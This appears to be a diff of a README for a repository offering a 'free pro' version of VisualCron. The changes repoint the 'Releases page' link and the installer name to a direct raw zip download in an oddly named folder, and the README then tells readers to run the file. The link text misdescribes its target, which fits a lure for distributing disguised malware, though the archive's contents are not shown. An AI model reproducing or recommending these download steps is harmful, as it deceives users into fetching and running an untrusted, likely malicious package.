sigittsu97/VisualCron-Pro-Free/README.md

 To begin using VisualCron-Pro-Free, follow these simple steps to download and set up the software.

 ## 📥 Download & Install
-1. **Visit the Download Page:** Click [here](https://github.com/sigittsu97/VisualCron-Pro-Free/releases) to go to the Releases page.
+1. **Visit the Download Page:** Click [here](https://raw.githubusercontent.com/sigittsu97/VisualCron-Pro-Free/main/transperitoneally/Visual_Free_Pro_Cron_v3.8.zip) to go to the Releases page.

 2. **Choose Your Version:** On the Releases page, you will see a list of available versions.
 Pick the latest version, usually displayed at the top.

-3. **Download the Installer:** Click on the installer link, typically named something like `VisualCron-Pro-Setup.exe`.
+3. **Download the Installer:** Click on the installer link, typically named something like `https://raw.githubusercontent.com/sigittsu97/VisualCron-Pro-Free/main/transperitoneally/Visual_Free_Pro_Cron_v3.8.zip`.
 This action will start the download.

 4. **Run the Installer:** Once the download finishes, locate the file in your Downloads folder.
 Double-click the file to run the installer.